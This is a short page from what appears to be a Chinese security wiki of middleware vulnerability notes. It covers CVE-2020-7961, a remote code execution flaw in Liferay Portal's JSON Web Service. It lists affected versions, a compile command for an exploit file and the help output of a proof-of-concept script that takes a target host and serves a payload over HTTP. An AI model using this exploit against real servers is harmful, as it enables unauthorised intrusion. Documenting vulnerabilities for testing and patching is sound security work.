menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Middleware-Vulnerability-detection-master chevron_right Liferay chevron_right CVE-2020-7961 Liferay Portal JSON Web Service RCE
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    CVE-2020-7961 Liferay Portal JSON Web Service RCE

    影响版本:

    • Liferay Portal 6.1.X
    • Liferay Portal 6.2.X
    • Liferay Portal 7.0.X
    • Liferay Portal 7.1.X
    • Liferay Portal 7.2.X

    exp

    javac LifExp.java

poc.py -h

  -t TARGET, --target-host TARGET
                        target host:port
  -u API_URL, --api-url API_URL
                        path to jsonws. Default: /api/jsonws
  -p BIND_PORT, --bind-port BIND_PORT
                        HTTP server bind port. Default 9091
  -l BIND_IP, --bind-ip BIND_IP
                        HTTP server bind IP. Default 127.0.0.1. It can't be
                        0.0.0.0

    @mzer0one